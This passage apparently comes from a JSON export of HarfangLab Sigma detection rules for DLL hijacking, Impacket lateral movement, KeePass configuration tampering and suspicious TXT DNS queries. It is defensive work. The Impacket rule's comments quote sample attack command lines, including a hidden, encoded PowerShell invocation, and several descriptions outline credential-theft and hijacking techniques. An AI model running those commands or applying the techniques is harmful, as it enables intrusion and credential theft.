"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_drvinst.yml",
"content": "title: DLL Hijacking via drvinst.exe\nid: 10a3eb4c-d254-488d-843c-5e77fb2f6b4c\ndescription: |\n Detects potential Windows DLL Hijacking via drvinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'drvinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DEVRTL.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c",
"rule_name": "DLL Hijacking via drvinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via drvinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10c14723-61c7-4c75-92ca-9af245723ad2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628613Z",
"creation_date": "2026-03-23T11:45:34.628615Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628619Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py",
"https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py",
"https://attack.mitre.org/software/S0357/"
],
"name": "t1047_impacket_lateral_movement.yml",
"content": "title: Impacket Lateral Movement Detected\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\ndescription: |\n Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\n Impacket is a collection of Python classes for working with network protocols.\n Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\n It is often used by threat actors to perform lateral movements.\n It is recommended investigate the process tree for suspicious activities.\n Is is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py\n - https://attack.mitre.org/software/S0357/\ndate: 2019/09/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0357\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n # *** wmiexec.py\n # parent is wmiprvse.exe\n # examples:\n # cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # *** dcomexec.py -object MMC20\n # parent is mmc.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n # *** dcomexec.py -object ShellBrowserWindow\n # runs 
%SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n # *** smbexec.py\n # parent is services.exe\n # example:\n # C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n # C:\\Windows\\system32\\cmd.exe /Q /c powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAdwBoAG8AYQBtAGkA 1> \\\\127.0.0.1\\ADMIN$\\__1615559515.6162736 2>&1\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # dcomexec MMC\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # wmiexec.py and dcomexec.py\n - '*cmd.exe* /Q /c * 1> \\\\\\\\127.0.0.1\\\\* 2>&1'\n # smbexec.py\n - '*cmd.exe* /Q /c * ^> \\\\\\\\127.0.0.1\\\\* 2^>^&1 > *'\n - '*powershell.exe* -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsA*'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10 (parent can be \"C:\\Windows\\system32\\svchost.exe -k netsvcs\" or \"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\")\n - 'taskeng.exe' # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n CommandLine: 'cmd.exe /C *Windows\\\\Temp\\\\*&1'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10c14723-61c7-4c75-92ca-9af245723ad2",
"rule_name": "Impacket Lateral Movement Detected",
"rule_description": "Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\nImpacket is a collection of Python classes for working with network protocols.\nImpacket is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself.\nIt is often used by threat actors to perform lateral movement.\nIt is recommended to investigate the process tree for suspicious activities.\nIt is also recommended to investigate the network-type authentications at the same time in order to get the IP address of the computer from which the lateral movement originates.\n",
"rule_creation_date": "2019-09-03",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10c34848-23dc-4d3c-a8e7-187197b79a2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621563Z",
"creation_date": "2026-03-23T11:45:34.621565Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621569Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://blog.slowerzs.net/posts/thievingfox/",
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1555_005_keepass_executable_config_write.yml",
"content": "title: KeePass Executable Configuration Modified by an External Tool\nid: 10c34848-23dc-4d3c-a8e7-187197b79a2d\ndescription: |\n Detects a modification of the KeePass.exe.config file that could lead to credential theft.\n Attackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\n It is recommended to check the file content for any added lines that could indicate a compromise.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: file_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.exe.config'\n\n filter_keepass:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Certum Code Signing 2021 CA'\n - 'Open Source Developer, Dominik Reichl'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\explorer.exe'\n\n exclusion_vsssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_7z:\n ProcessImage|endswith:\n - '\\7z.exe'\n - '\\7zG.exe'\n - '\\7zM.exe'\n - '\\7zFM.exe'\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_winrar:\n ProcessOriginalFileName: 'WinRAR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'win.rar GmbH'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistps1.exe'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: 
moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10c34848-23dc-4d3c-a8e7-187197b79a2d",
"rule_name": "KeePass Executable Configuration Modified by an External Tool",
"rule_description": "Detects a modification of the KeePass.exe.config file that could lead to credential theft.\nAttackers may modify KeePass' configuration file, which defines the behavior of the .NET runtime, by replacing native function pointers with malicious ones in order to dump the password database.\nIt is recommended to check the file content for any added lines that could indicate a compromise.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601524Z",
"creation_date": "2026-03-23T11:45:34.601528Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601536Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cscript.yml",
"content": "title: DLL Hijacking via cscript.exe\nid: 112484b0-ac5d-40a8-a775-0a918f1aa7f1\ndescription: |\n Detects potential Windows DLL Hijacking via cscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1",
"rule_name": "DLL Hijacking via cscript.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1129f074-5b01-412c-9fae-a3a2a3b01770",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087075Z",
"creation_date": "2026-03-23T11:45:34.087078Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087084Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secur32.yml",
"content": "title: Suspicious secur32.dll Loaded\nid: 1129f074-5b01-412c-9fae-a3a2a3b01770\ndescription: |\n Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\secur32.dll'\n sha256|contains: '?' 
# At least one character, some SHA256 are empty\n\n filter_signed_microsoft:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_commonfolders:\n ImageLoaded:\n - '?:\\Windows\\WinSxS\\\\*'\n - '?:\\Windows\\System32\\secur32.dll'\n - '?:\\Windows\\syswow64\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\secur32.dll'\n - '*\\docker\\data\\windowsfilter\\\\*\\files\\windows\\syswow64\\secur32.dll'\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\secur32.dll'\n - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\windows\\system32\\secur32.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\secur32.dll'\n\n exclusion_siemens:\n ImageLoaded:\n - '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n - '?:\\PROGRA~2\\Siemens\\UniCam\\UniCam FX\\Secur32.dll'\n Image|startswith: '?:\\Program Files (x86)\\Siemens\\UniCam\\UniCam FX\\'\n\n exclusion_elisath:\n Image:\n - '?:\\Elisath\\Gestion\\Gestion.exe'\n - '?:\\Elisath\\Caisse\\Caisse.exe'\n ImageLoaded:\n - '?:\\Elisath\\Gestion\\secur32.dll'\n - '?:\\Elisath\\Caisse\\secur32.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1129f074-5b01-412c-9fae-a3a2a3b01770",
"rule_name": "Suspicious secur32.dll Loaded",
"rule_description": "Detects loading of a suspicious DLL named 'secur32.dll' by a process that could be a target of DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1181e4c8-56a6-49c2-971f-caa5665133a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626425Z",
"creation_date": "2026-03-23T11:45:34.626427Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_suspicious_txt_dns_linux.yml",
"content": "title: Suspicious TXT DNS Resolution (Linux)\nid: 1181e4c8-56a6-49c2-971f-caa5665133a3\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/04/02\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: '?'\n ProcessImage|contains: '?'\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n - 'dkim=unknown'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName:\n - 'version.bind'\n - 'hostname.bind'\n\n filter_know_requested_name_endswith:\n QueryName|endswith:\n - '.local'\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - 'engine._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.logmein-gateway.com'\n - 'current.cvd.clamav.net'\n - '.asn.rspamd.com'\n - '.asn.cymru.com'\n - 'secpoll.powerdns.com'\n - 'wgs.prod.surfshark.com'\n - 'push.apple.com'\n - '.pci.id.ucw.cz'\n - 
'.sophosxl.net'\n\n filter_mailer:\n - ProcessCommandLine|contains:\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/amavisd'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/milter-greylist'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim4'\n - 'MailScanner: starting child'\n - '/usr/bin/perl -U -I /usr/share/MailScanner/perl /usr/sbin/MailScanner /etc/MailScanner/MailScanner.conf'\n - '/opt/zimbra/common/sbin/amavisd'\n - 'MailScanner: ' # MailScanner: waiting for messages\n - '/usr/bin/spamd'\n - '/usr/bin/perl -T -w /usr/bin/spamd '\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n - 'spamd child'\n - Image:\n - '/usr/sbin/milter-greylist'\n - '/usr/lib/postfix/sbin/smtpd'\n - '/usr/libexec/postfix/smtpd'\n - '/usr/sbin/named'\n - '/usr/local/sbin/named'\n - '/usr/sbin/opendkim'\n - '/usr/sbin/opendmarc'\n - '/usr/sbin/exim'\n - '/usr/sbin/exim4'\n - '/usr/bin/rspamd'\n\n filter_dns:\n Image:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/sbin/dig'\n - '/usr/bin/dig'\n - '/usr/local/nessy2/bin/named'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_image:\n ProcessImage:\n - '/opt/nessus/sbin/nessusd'\n - '/usr/bin/figal-client'\n - '/usr/bin/figal-sitename'\n - '*/rapid7/nexpose/nsc/.DLLCACHE/nexserv'\n - '/usr/bin/mongorestore'\n - '/usr/libexec/sssd/sssd_be'\n - 